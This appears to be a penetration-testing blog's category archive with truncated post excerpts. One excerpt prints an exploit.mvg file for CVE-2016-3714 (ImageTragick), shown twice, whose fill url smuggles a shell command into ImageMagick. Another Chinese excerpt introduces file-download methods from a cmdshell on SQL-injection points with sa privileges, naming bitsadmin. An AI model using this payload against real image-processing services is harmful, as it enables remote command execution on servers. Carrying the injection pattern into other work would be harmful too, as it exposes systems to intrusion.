Category Archives: 渗透测试

CVE-2016-3714 exp

exploit.mvg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg;"|touch "/tmp/hacker.shell)'
pop graphic-context

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg;"|touch "/tmp/hacker.shell)'

pop graphic-context

exploit.sv… Read More »

本文指在记录一些cmdshell下的download方法，例如：sa权限的注射点。 0x1 bitsadmin… Read More »